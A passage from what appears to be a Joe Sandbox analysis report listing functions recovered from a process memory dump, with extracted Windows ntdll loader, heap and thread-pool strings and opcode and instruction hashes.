                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: 7e6dbd098597acb3e0a1b7663cc1a2b9e20290c769bda7565456cbef26fcd298
                                                                                  • Instruction ID: f848c23e8636c61a3c240b90a1db430dacbd1cc3bc40291b465496194537b718
                                                                                  • Opcode Fuzzy Hash: 7e6dbd098597acb3e0a1b7663cc1a2b9e20290c769bda7565456cbef26fcd298
                                                                                  • Instruction Fuzzy Hash: CC428C75A40715DFDB20DF24C888BAAB7F5BF44300F1445A9EA99EB241E770AA84DF60
                                                                                  Function 057C4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                  • API String ID: 0-2518169356
                                                                                  • Opcode ID: 97b3c47889e2fca90c39e6fe3aa7aea0c181eec1d55c9346b3c5fb1505f8a67d
                                                                                  • Instruction ID: 8c34eed63fdecfdd44c00dbf7e7a21d7cbfedee67521fc9887426afee8ce958a
                                                                                  • Opcode Fuzzy Hash: 97b3c47889e2fca90c39e6fe3aa7aea0c181eec1d55c9346b3c5fb1505f8a67d
                                                                                  • Instruction Fuzzy Hash: 6A91B372E106198BCB21CF68C885ABEBBB1FF48310F5941ADE851E7350E776E941DB90
                                                                                  Function 0574A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: 608398e6f1946435912eb6edc3ab7b8b41fbe0d8e14aa0c19ebcbb2cc513311d
                                                                                  • Instruction ID: 2622066a301594b80ddcca66eeb9e4a4aa65b3316862fcd4184ee562e6af77cc
                                                                                  • Opcode Fuzzy Hash: 608398e6f1946435912eb6edc3ab7b8b41fbe0d8e14aa0c19ebcbb2cc513311d
                                                                                  • Instruction Fuzzy Hash: 22C18A75248382CFD711DF19C144B6AB7E6FF84704F04896AF8968B251E734CA49EF62
                                                                                  Function 05778402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 05778422
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05778421
                                                                                  • @, xrefs: 05778591
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0577855E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: 800311f45ba8d862377559b4d75ca3a1ebbd8e9f2a85d0b8d95c1b82582e1970
                                                                                  • Instruction ID: fbbefaab92e627bb7e848e24e4c12eca70833e97f2c6f8f520b617e97bfb1403
                                                                                  • Opcode Fuzzy Hash: 800311f45ba8d862377559b4d75ca3a1ebbd8e9f2a85d0b8d95c1b82582e1970
                                                                                  • Instruction Fuzzy Hash: 03919071648348AFDB21EF21D859FBBBAE8BB84744F44092DFA8496150E770D904EB63
                                                                                  Function 05750C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 057A55AE
                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 057A54ED
                                                                                  • HEAP[%wZ]: , xrefs: 057A54D1, 057A5592
                                                                                  • HEAP: , xrefs: 057A54E0, 057A55A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                  • API String ID: 0-1657114761
                                                                                  • Opcode ID: 607397c2b8043ebbb1f992805f092c6ec8f379443723521d51fca1b548037139
                                                                                  • Instruction ID: 11139264a14c50b1570e28493f645ded7287e96b25238a3a291d1335f9a4779c
                                                                                  • Opcode Fuzzy Hash: 607397c2b8043ebbb1f992805f092c6ec8f379443723521d51fca1b548037139
                                                                                  • Instruction Fuzzy Hash: DCA11474604755DFD724CF28C449BBAB7E2BF45320F148569EC8A8B282E7B0E844EB91
                                                                                  Function 0577273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 057B21DE
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 057B22B6
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 057B21D9, 057B22B1
                                                                                  • .Local, xrefs: 057728D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: dc687728f90ab39912e52136f13ed6b3c677ff91f4eeba60ac95556c2fa207de
                                                                                  • Instruction ID: 912d10bde33db7fff56937bad768c6a26f70a5ac14ed3a1c9c04c936951a3dfe
                                                                                  • Opcode Fuzzy Hash: dc687728f90ab39912e52136f13ed6b3c677ff91f4eeba60ac95556c2fa207de
                                                                                  • Instruction Fuzzy Hash: 03A1A039A0522D9FDF24CF64D888BE9B3B1BF58314F1501E9D819AB252D7709E81EF90
                                                                                  Function 057464AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 057A10AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 057A0FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 057A1028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 057A106B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: d8734c68a01aa363eb3f030b30cdb41565924412f84e772ac6ba100375968c57
                                                                                  • Instruction ID: 5c443f38016dd1710cb24d9de3e1354ec98a2177fc4ae777786aac6f2c7ad006
                                                                                  • Opcode Fuzzy Hash: d8734c68a01aa363eb3f030b30cdb41565924412f84e772ac6ba100375968c57
                                                                                  • Instruction Fuzzy Hash: AA71D6B1A043449FCB20EF15C889FABBFA9AF85764F400568F9498B146D734D588EFD2
                                                                                  Function 05774D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 057B3640, 057B366C
                                                                                  • LdrpFindDllActivationContext, xrefs: 057B3636, 057B3662
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 057B365C
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 057B362F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
                                                                                  • Instruction ID: 022863e871f48089ed00a006ba57ea5fe08be76702b3dc811d37e88908fd1547
                                                                                  • Opcode Fuzzy Hash: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
                                                                                  • Instruction Fuzzy Hash: EC314C72A04239AEDF31DF48E849F75B6ABFB01714F064426EA8553250DBA0AF80B7D5
                                                                                  Function 0576245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 057AA992
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057AA9A2
                                                                                  • apphelp.dll, xrefs: 05762462
                                                                                  • LdrpDynamicShimModule, xrefs: 057AA998
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: 904377dc2d194a0bf09991104d099eded8a905ddceaca631bc7e6241a0761c5d
                                                                                  • Instruction ID: c7c1ce3fedc8c2db56ccb9c76a5dbdfab08994a30a7629e703468f579548ff61
                                                                                  • Opcode Fuzzy Hash: 904377dc2d194a0bf09991104d099eded8a905ddceaca631bc7e6241a0761c5d
                                                                                  • Instruction Fuzzy Hash: 6E310572A14201ABDB20DF59D84AE7E7FB5FB84710F154929FC116B241DFB4AC81EB80
                                                                                  Function 05750770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: 3a7f74db16611a01d50abe744069be4a184fb8b030876bb0ba57709561c1915b
                                                                                  • Instruction ID: 24c531158698a43237a58d9102b9a48301d2f73a0188fa4b7276186a0f908e41
                                                                                  • Opcode Fuzzy Hash: 3a7f74db16611a01d50abe744069be4a184fb8b030876bb0ba57709561c1915b
                                                                                  • Instruction Fuzzy Hash: 07F18A71B04605DFDB15CF68C888F7AB7B6FF84310F144268E8169B391E774A981EB91
                                                                                  Function 05766962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: 9e67a4c0e2a34d88e8c92c56339a8346780ef7be759b46875e759589cb2fa9af
                                                                                  • Instruction ID: 7942bddfa393183a785eb4f3de7f1c186b37c1f6018816a3ca9e958a94912c4e
                                                                                  • Opcode Fuzzy Hash: 9e67a4c0e2a34d88e8c92c56339a8346780ef7be759b46875e759589cb2fa9af
                                                                                  • Instruction Fuzzy Hash: 09C25B726083419FDB29CF24C885BABBBE6FFC8754F04892DF98987251D734D844AB52
                                                                                  Function 0573A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: 766a6b909bac39b9345faf86a7909f796afb717a5c9b7d5725df56f80b36f006
                                                                                  • Instruction ID: 97049b6472c21b5bf7f13bb97c5736fe4dfaceac8ed0b4aec12373359d2fb29c
                                                                                  • Opcode Fuzzy Hash: 766a6b909bac39b9345faf86a7909f796afb717a5c9b7d5725df56f80b36f006
                                                                                  • Instruction Fuzzy Hash: 0AA18B71A016289BDF26DF24DC8DBAAB7B8FF44710F0001E9E909A7250E7359E84DF50
                                                                                  Function 0573CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0573CD34
                                                                                  • InstallLanguageFallback, xrefs: 0573CD7F
                                                                                  • @, xrefs: 0573CD63
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                  • API String ID: 0-1757540487
                                                                                  • Opcode ID: a7e4cbc4452694410f986315b5b282c9de2b615c2ca8d498b24996995279c49f
                                                                                  • Instruction ID: 352789c77b59fbb3f0500fa484d3d414070fc907c897161bfe73bbed0bb0257b
                                                                                  • Opcode Fuzzy Hash: a7e4cbc4452694410f986315b5b282c9de2b615c2ca8d498b24996995279c49f
                                                                                  • Instruction Fuzzy Hash: DC5126B65183519BCB15DF68D448ABBB3E8BF88714F00092EF986E7210E734DD04E7A2
                                                                                  Function 0577C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057B82E8
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 057B82DE
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 057B82D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 386afe5c571db786dc2f81d85e339c727c7a006e4475afafb3fea7c04a82496d
                                                                                  • Instruction ID: 4cac9caa41d600f6b0db7747ad4c89748347a1f3d2d9ff034cdbab504624b44a
                                                                                  • Opcode Fuzzy Hash: 386afe5c571db786dc2f81d85e339c727c7a006e4475afafb3fea7c04a82496d
                                                                                  • Instruction Fuzzy Hash: 6641C471658304ABDB21EB64E94AF5B7BE8AF48750F00492AFD55D7250EBB0E800AB91
                                                                                  Function 057FC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • @, xrefs: 057FC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 057FC1C5
                                                                                  • PreferredUILanguages, xrefs: 057FC212
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: f49f7d9d6d458640f46a11fdabe170954103e0820b0f4b6bdb6857ac4a8687a4
                                                                                  • Instruction ID: 2675d2ace594b53736531794ba5c3914b1fc9b600077dc1d5bb193e7cbc2d457
                                                                                  • Opcode Fuzzy Hash: f49f7d9d6d458640f46a11fdabe170954103e0820b0f4b6bdb6857ac4a8687a4
                                                                                  • Instruction Fuzzy Hash: D2417E72E0420DEBDB12DAD8C885FEEB7BDFB08710F14406AEA05A7280D7749E44AB50
                                                                                  Function 057C4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 057C488F
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 057C4888
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 057C4899
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 0615fb837435b16b6a71bfddd1d4c5c5f42ca06ee7192e0e37bc8ea170e28a32
                                                                                  • Instruction ID: de05cc11c044322d63071f5343e60ff041faa41721f3000d87dd07227f060a6d
                                                                                  • Opcode Fuzzy Hash: 0615fb837435b16b6a71bfddd1d4c5c5f42ca06ee7192e0e37bc8ea170e28a32
                                                                                  • Instruction Fuzzy Hash: E3419E32A186509FCF21CE68D864A267FE7FF49B52F0506ADEC49D7211D730E800EB91
                                                                                  Function 057D4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 3e41d54c9a77c4b6779cc7e41c762077c8a70762a0accae4f4853df88236aa7e
                                                                                  • Instruction ID: 7421e68fcedbdacd6b998d1b8555c169993b884dc0d6f980228bfa23c5d12fcb
                                                                                  • Opcode Fuzzy Hash: 3e41d54c9a77c4b6779cc7e41c762077c8a70762a0accae4f4853df88236aa7e
                                                                                  • Instruction Fuzzy Hash: D2410471A043988BEF25DBA5C848FADFBBAFF45350F140459D802EB791D7B59901EB20
                                                                                  Function 057C20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializationFailure, xrefs: 057C20FA
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057C2104
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 057C20F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 20f7ca95c069724896ce76e9f33cd23226e7aec6223252c7a85f073261fd25f4
                                                                                  • Instruction ID: ada7d4e3e8378e4161408c6eda3e723d7113349c16e2308646913b61b4d93378
                                                                                  • Opcode Fuzzy Hash: 20f7ca95c069724896ce76e9f33cd23226e7aec6223252c7a85f073261fd25f4
                                                                                  • Instruction Fuzzy Hash: B5F0A475750258ABD714EA4C8C4BFA93F68EB41B54F5004ADFA4077682D9B0E500E691
                                                                                  Function 057503E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: 550e625b1cc103d4ad71ac07386604117a1995e20e1223747710d0104ffbf7ad
                                                                                  • Instruction ID: cbd5cee2a7b5c6f55f444ac423f3714dfd9d6aa2f8650f6563bc46b1fae59c6c
                                                                                  • Opcode Fuzzy Hash: 550e625b1cc103d4ad71ac07386604117a1995e20e1223747710d0104ffbf7ad
                                                                                  • Instruction Fuzzy Hash: CB718C72A002499FDB01DFA8C988FAEB7F9FF48704F140065E905E7251EA75ED41DBA0
                                                                                  Function 057CCEA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 057CCFBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallFilterFunc@8
                                                                                  • String ID: @
                                                                                  • API String ID: 4062629308-2766056989
                                                                                  • Opcode ID: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
                                                                                  • Instruction ID: 7def774db68fa44ea5c1940e56e953ede08836489de1e7c734147bb80fdc7add
                                                                                  • Opcode Fuzzy Hash: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
                                                                                  • Instruction Fuzzy Hash: C441BFB1A00654DFCB21DFA9C849A6DBBB8FF44710F00456EED15DB250EB74D841EBA4
                                                                                  Function 0580A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 1e784d0297155530d8d0fd57a6182d6f1b74c5b3b3ecafebefbcc82188cadaf5
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 42C1D1312083459BDB68CF28CC45B6BBBE6BF84318F049A2CF996CA2D0D775D905CB42
                                                                                  Function 057BE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: 82d9e8f9d0fee3b9e5f413e327792cc2f72d246f4ee0cbe89a7ee5b21a0a1829
                                                                                  • Instruction ID: 6f6c6f07f936b597a165e48aca6d5baf9910d2f487d8587d4b64782e944d33a7
                                                                                  • Opcode Fuzzy Hash: 82d9e8f9d0fee3b9e5f413e327792cc2f72d246f4ee0cbe89a7ee5b21a0a1829
                                                                                  • Instruction Fuzzy Hash: 42616B71E046189FEB24DFA8C844BEEBBB9FB48700F50806DE959EB351D771A900EB50
                                                                                  Function 0574AC50 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpResGetMappingSize Enter, xrefs: 0574AC6A
                                                                                  • LdrpResGetMappingSize Exit, xrefs: 0574AC7C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                  • API String ID: 0-1497657909
                                                                                  • Opcode ID: f8b97caba6acaa7e11e4e7daf60bebc52c1188f9485d35358d0589e26fb0a2d9
                                                                                  • Instruction ID: 66b1ef803b62dd7d6a3c85b4cbcd278aef96bbe648cdefd9780f5504710c0379
                                                                                  • Opcode Fuzzy Hash: f8b97caba6acaa7e11e4e7daf60bebc52c1188f9485d35358d0589e26fb0a2d9
                                                                                  • Instruction Fuzzy Hash: 0261D172A486549FEB15CFA8C844BADB7B6FF48751F04056AE802EB294E774D940EF20
                                                                                  Function 057E43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 7ea0c4b408c4e5fe7b3a9d7735e81f98263269eeb32e00c3dda2bca0b03da68c
